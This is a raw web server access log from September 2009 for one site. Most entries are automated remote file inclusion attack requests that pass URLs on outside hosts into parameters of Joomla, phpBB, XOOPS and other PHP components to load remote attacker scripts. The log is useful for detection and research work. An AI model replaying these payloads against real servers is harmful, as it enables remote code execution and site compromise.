74.53.96.178 - - [16/Sep/2009:12:39:25 -0700] "GET /logs/access_081125.log////////?cmd&file=http://bulgariaunderscope.com/root/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.53.96.178 - - [16/Sep/2009:12:39:25 -0700] "GET /logs////////?cmd&file=http://bulgariaunderscope.com/root/tukulid.txt?? HTTP/1.1" 200 117502 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.53.96.178 - - [16/Sep/2009:12:39:26 -0700] "GET ///////?cmd&file=http://bulgariaunderscope.com/root/tukulid.txt?? HTTP/1.1" 200 19910 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:39:27 -0700] "GET ///skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:39:27 -0700] "GET /logs/access_090305.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:39:56 -0700] "GET /logs/access_080621.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.45.190.166 - - [16/Sep/2009:12:40:29 -0700] "GET /logs/access_080327.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:40:39 -0700] "GET /logs/access_081007.log/includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:40:39 -0700] "GET /includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:40:40 -0700] "GET /logs/includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:41:00 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:41:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:41:00 -0700] "GET /logs/access_080627.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:41:04 -0700] "GET /logs/access_080627.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:41:04 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:41:04 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:41:15 -0700] "GET /logs/access_090101.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.16.182.130 - - [16/Sep/2009:12:41:40 -0700] "GET /logs/access_090713.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.zebrahead.fr/img/id.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:41:41 -0700] "GET /logs/access_080226.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:41:42 -0700] "GET /blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:41:42 -0700] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:41:52 -0700] "GET /logs/access_081026.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:42:16 -0700] "GET /logs/access_090617.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:42:16 -0700] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 200 117470 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:42:16 -0700] "GET //?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 200 19886 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:42:29 -0700] "GET /logs/access_090305.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.2.88 - - [16/Sep/2009:12:42:32 -0700] "GET /main.php?inc=http://www.opernakademie-badorb.de/administrator/components/com_installer/language/view/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.2.88 - - [16/Sep/2009:12:42:32 -0700] "GET /logs//main.php?inc=http://www.opernakademie-badorb.de/administrator/components/com_installer/language/view/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.2.88 - - [16/Sep/2009:12:42:32 -0700] "GET /logs/access_081213.log%20%20//main.php?inc=http://www.opernakademie-badorb.de/administrator/components/com_installer/language/view/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.2.88 - - [16/Sep/2009:12:42:51 -0700] "GET /logs/access_081213.log//main.php?inc=http://www.opernakademie-badorb.de/administrator/components/com_installer/language/view/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.2.88 - - [16/Sep/2009:12:42:51 -0700] "GET /logs/access_080402.log//main.php?inc=http://www.opernakademie-badorb.de/administrator/components/com_installer/language/view/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:12:44:20 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:44:22 -0700] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:44:22 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:44:23 -0700] "GET /?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 200 19914 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:12:44:23 -0700] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:44:24 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 200 117496 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [16/Sep/2009:12:44:25 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
92.52.216.123 - - [16/Sep/2009:12:44:25 -0700] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:12:44:25 -0700] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 200 19868 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:44:27 -0700] "GET /logs/access_081114.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:44:27 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:44:28 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19847 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:44:36 -0700] "GET /logs/access_090101.log%20%20//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:44:57 -0700] "GET /logs/access_080601.log//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:44:57 -0700] "GET /logs/access_081026.log//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:44:58 -0700] "GET /logs/access_080901.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:44:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:44:59 -0700] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:12:45:00 -0700] "GET /logs/access_080602.log%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:45:09 -0700] "GET /logs/access_090817.log///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.14.106.24 - - [16/Sep/2009:12:45:19 -0700] "GET /logs/access_090903.log/skin/ggambo7002_board/write.php?dir=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:45:27 -0700] "GET /logs/access_081111.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:12:45:40 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.52.216.123 - - [16/Sep/2009:12:45:40 -0700] "GET /logs/access_080111.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:46:06 -0700] "GET //?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 200 19886 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:46:06 -0700] "GET /logs///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 200 117470 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:46:06 -0700] "GET /logs/access_090617.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:46:15 -0700] "GET /logs/access_090305.log%20%20///?_zb_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:12:46:33 -0700] "GET /bikes/dteel/EQ2/2009-07-25/?M=A HTTP/1.0" 200 1710 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:46:39 -0700] "GET /error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:46:39 -0700] "GET /logs/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:46:48 -0700] "GET /logs/access_080304.log%20%20/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:12:46:54 -0700] "GET /logs/access_080626.log%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:46:59 -0700] "GET /logs/access_090326.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:46:59 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:46:59 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:12:47:07 -0700] "GET /logs/access_080501.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:12:47:36 -0700] "GET /logs///?page=http://www.tuwebtv.es/cache/id? HTTP/1.1" 200 117497 "-" "libwww-perl/5.831" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:47:58 -0700] "GET /logs/access_081026.log//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.230.148.66 - - [16/Sep/2009:12:47:58 -0700] "GET /logs/access_080601.log//blend_data/blend_common.php?phpbb_root_path=http://cyberparty.fileave.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:47:59 -0700] "GET /logs/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:47:59 -0700] "GET /logs/access_090514.log%20%20/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:47:59 -0700] "GET /index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 200 19843 "-" "Mozilla/5.0" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:48:01 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:48:01 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:48:01 -0700] "GET /logs/access_080724.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:48:01 -0700] "GET /logs/access_090317.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:03 -0700] "GET /mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:03 -0700] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 19867 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:04 -0700] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 200 19867 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:17 -0700] "GET /logs/access_080305.log%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:17 -0700] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:17 -0700] "GET /logs/access_080619.log%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.116.209 - - [16/Sep/2009:12:48:20 -0700] "GET /logs/access_080916.log%20%20/index.php?option=com_wrapper&task=view&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:12:48:22 -0700] "GET /logs/access_080602.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:22 -0700] "GET /logs/access_080305.log%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:22 -0700] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:22 -0700] "GET /logs/mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:22 -0700] "GET /logs/access_080305.log%20%20/mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:48:23 -0700] "GET /logs/access_081027.log/////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:48:24 -0700] "GET ////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:48:24 -0700] "GET /logs/////s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:26 -0700] "GET /logs/access_080619.log%20%20/mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:48:26 -0700] "GET /logs/access_080619.log%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.136.56 - - [16/Sep/2009:12:48:26 -0700] "GET /logs/access_080626.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://philen.byroe.net/~arabhack/jurekznitip/scan/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:48:31 -0700] "GET /logs/access_090317.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:48:31 -0700] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:48:39 -0700] "GET /logs/access_080515.log//?path%5Bdocroot%5D=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:48:57 -0700] "GET /logs/access_090517.log%20%20/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.205.88 - - [16/Sep/2009:12:49:02 -0700] "GET /logs///?page=http://www.tuwebtv.es/cache/id? HTTP/1.1" 200 117497 "-" "libwww-perl/5.831" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:49:25 -0700] "GET /logs/access_080823.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:49:34 -0700] "GET /error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:49:35 -0700] "GET /logs/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:49:35 -0700] "GET /logs/access_081017.log/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:49:42 -0700] "GET /logs/access_081001.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.116.50.218 - - [16/Sep/2009:12:49:44 -0700] "GET /logs/access_080526.log/error.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:50:33 -0700] "GET /logs/access_080602.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [16/Sep/2009:12:50:34 -0700] "GET /logs/access_080626.log/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:50:47 -0700] "GET /logs/access_080109.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:50:47 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:50:47 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.143.55 - - [16/Sep/2009:12:50:51 -0700] "GET /logs/access_080626.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
